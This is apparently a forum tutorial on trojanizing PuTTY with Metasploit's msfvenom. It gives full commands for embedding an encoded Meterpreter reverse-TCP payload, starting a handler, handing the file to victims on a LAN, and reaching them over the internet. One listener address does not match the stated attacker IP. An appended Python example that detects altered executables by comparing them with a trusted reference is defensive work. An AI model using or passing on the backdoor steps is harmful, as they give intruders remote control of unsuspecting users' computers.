x32x01
Today, we’re going to create a Windows executable backdoor using the Metasploit Exploitation Framework’s msfvenom.
How To Backdoor Windows Executables Using Metasploit
First make sure Metasploit is already installed.
If you’re using Mac/Linux you can install Metasploit by using this method. If you’re using Kali Linux then Metasploit is pre-installed on it.
For LAN/Wifi Networks:
Now follow me step by step:
Attacker’s IP: 192.168.1.2
Victim’s IP: 192.168.1.x (within LAN network it might be any IP)
1- Open terminal and download putty using wget.
Code:
wget http://the.earth.li/~sgtatham/putty/0.63/x86/putty.exe
2- I was in the root directory when I used the above command, so putty got downloaded to the /root/ directory.
Now use msfvenom to backdoor this executable using the following command.
Code:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=192.168.0.14 LPORT=5555 > evilputty.exe
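The above command will generate an EXE file with the name evilputty.exe. This is our backdoored executable file.
3- Start metasploit.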
Code:
msfconsole
4- Start metasploit’s reverse handler to get a reverse connection.
Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 5555
exploit
5- Distribute this evilputty.exe file in your LAN/Wifi network and wait for the victim. When the victim opens this evilputty.exe, you will get a reverse shell on your metasploit’s handler. Happy Hacking
For WAN Or Internet:
To use this method over WAN/Internet, you need to forward your ports.
Follow my tutorial for a better understanding of how metasploit works over the internet.
If you have successfully forwarded and opened your port:
Code:
msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=”YOUR PUBLIC IP ADDRESS” LPORT=5555 > evilputty.exe
Your public IP address might not be static, so in that case you should use NO-IP DNS to get a static address.
Simply write your NO-IP host in LHOST=example.noip.com
If you have any questions related to port forwarding or attacking in WAN Network please don’t forget to comment below!
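A copy of a known program that has been rebuilt around an added payload no longer matches the vendor's release byte for byte. As an added example (not part of the original post), this Python code compares a received executable with a trusted reference copy of the same release: SHA-256 first, then the PE entry point and section table to show what changed. The function names are assumptions, and the two sample images are constructed header-only data containing no code.

```python
import hashlib
import struct

MEM_EXECUTE, MEM_WRITE = 0x20000000, 0x80000000   # IMAGE_SCN_MEM_* flags
CODE, DATA = 0x60000020, 0xC0000040               # typical r-x code, rw- data

def pe_summary(data: bytes):
    """Return (entry_point_rva, {section_name: (raw_size, characteristics)})."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    nsec, opt_size = struct.unpack_from("<H12xH", data, pe + 6)
    entry = struct.unpack_from("<I", data, pe + 24 + 16)[0]  # AddressOfEntryPoint
    sections = {}
    for i in range(nsec):                                   # 40-byte section headers
        name, raw_size, chars = struct.unpack_from(
            "<8s8xI16xI", data, pe + 24 + opt_size + 40 * i)
        sections[name.rstrip(b"\0").decode("ascii", "replace")] = (raw_size, chars)
    return entry, sections

def compare_to_reference(reference: bytes, candidate: bytes):
    """List how candidate differs from a trusted copy of the same release."""
    if hashlib.sha256(reference).digest() == hashlib.sha256(candidate).digest():
        return []
    findings = ["SHA-256 differs from reference"]
    ref_entry, ref_secs = pe_summary(reference)
    entry, secs = pe_summary(candidate)
    if entry != ref_entry:
        findings.append(f"entry point moved {ref_entry:#x} -> {entry:#x}")
    for name, (size, chars) in secs.items():
        if name not in ref_secs:
            findings.append(f"section {name} not in reference")
        elif ref_secs[name] != (size, chars):
            findings.append(f"section {name} size or flags changed")
        if chars & MEM_EXECUTE and chars & MEM_WRITE:       # unusual for compiler output
            findings.append(f"section {name} is writable and executable")
    return findings

def make_pe(entry, sections):
    """Build a header-only PE32 image for the demo (constructed data, no code)."""
    opt = struct.pack("<H14xI", 0x10B, entry).ljust(224, b"\0")
    hdr = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40) + b"PE\0\0"
    hdr += struct.pack("<HH12xHH", 0x14C, len(sections), len(opt), 0x102)
    return hdr + opt + b"".join(
        struct.pack("<8s8xI16xI", n.encode(), size, ch) for n, size, ch in sections)

REFERENCE = make_pe(0x1000, [(".text", 0x5000, CODE), (".data", 0x1000, DATA)])
ALTERED = make_pe(0x9000, [(".text", 0x5000, CODE), (".data", 0x1000, DATA),
                           (".xyz", 0x800, CODE | MEM_WRITE)])
if __name__ == "__main__":
    print("\n".join(compare_to_reference(REFERENCE, ALTERED)))
```

In practice the reference bytes come from the vendor's own download, checked against the vendor's published checksums or signature.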